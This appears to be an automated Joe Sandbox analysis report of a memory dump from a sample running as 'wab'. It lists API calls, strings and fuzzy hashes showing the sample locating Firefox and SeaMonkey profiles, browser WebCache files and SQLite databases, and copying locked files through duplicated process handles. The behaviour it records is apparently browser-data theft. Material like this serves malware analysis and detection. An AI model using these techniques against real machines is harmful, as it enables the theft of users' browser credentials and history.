                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403F6B
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                            • API String ID: 3527940856-2068335096
                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                            APIs
                                            • memset.MSVCRT ref: 00403FE1
                                            • memset.MSVCRT ref: 00403FF6
                                            • memset.MSVCRT ref: 0040400B
                                            • memset.MSVCRT ref: 00404020
                                            • memset.MSVCRT ref: 00404035
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 004040FC
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                            • API String ID: 3527940856-3369679110
                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                            • API String ID: 3510742995-2641926074
                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                            APIs
                                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 004033B7
                                            • memcpy.MSVCRT ref: 004033D0
                                            • wcscmp.MSVCRT ref: 004033FC
                                            • _wcsicmp.MSVCRT ref: 00403439
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                            • String ID: $0.@
                                            • API String ID: 3030842498-1896041820
                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 2941347001-0
                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                            APIs
                                            • memset.MSVCRT ref: 00403C09
                                            • memset.MSVCRT ref: 00403C1E
                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                            • wcscat.MSVCRT ref: 00403C47
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • wcscat.MSVCRT ref: 00403C70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memsetwcscat$Closewcscpywcslen
                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                            • API String ID: 3249829328-1174173950
                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                            APIs
                                            • memset.MSVCRT ref: 0040A824
                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • wcscpy.MSVCRT ref: 0040A854
                                            • wcscat.MSVCRT ref: 0040A86A
                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 669240632-0
                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                            APIs
                                            • wcschr.MSVCRT ref: 00414458
                                            • _snwprintf.MSVCRT ref: 0041447D
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                            • String ID: "%s"
                                            • API String ID: 1343145685-3297466227
                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                            APIs
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProcessTimes
                                            • String ID: GetProcessTimes$kernel32.dll
                                            • API String ID: 1714573020-3385500049
                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                            APIs
                                            • memset.MSVCRT ref: 004087D6
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                            • memset.MSVCRT ref: 00408828
                                            • memset.MSVCRT ref: 00408840
                                            • memset.MSVCRT ref: 00408858
                                            • memset.MSVCRT ref: 00408870
                                            • memset.MSVCRT ref: 00408888
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                            • String ID:
                                            • API String ID: 2911713577-0
                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcmp
                                            • String ID: @ $SQLite format 3
                                            • API String ID: 1475443563-3708268960
                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                            APIs
                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            • memset.MSVCRT ref: 00414C87
                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 2705122986-2036018995
                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 1579243037-1578091866
                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                            APIs
                                            • memset.MSVCRT ref: 0040E60F
                                            • memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Strings
                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                            • API String ID: 3354267031-2114579845
                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                            APIs
                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                            APIs
                                            Strings
                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                            • API String ID: 2221118986-1725073988
                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                            APIs
                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotificationSleep
                                            • String ID: }A
                                            • API String ID: 1821831730-2138825249
                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@DeleteObject
                                            • String ID: r!A
                                            • API String ID: 1103273653-628097481
                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                            APIs
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                            • memcmp.MSVCRT ref: 00444BA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$memcmp
                                            • String ID: $$8
                                            • API String ID: 2808797137-435121686
                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                            APIs
                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                              • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                            • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                            • String ID:
                                            • API String ID: 1042154641-0
                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                            APIs
                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                              • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
